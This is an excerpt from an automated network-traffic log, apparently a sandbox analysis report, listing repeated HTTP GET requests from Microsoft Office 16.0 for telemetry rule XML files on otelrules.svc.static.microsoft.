              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
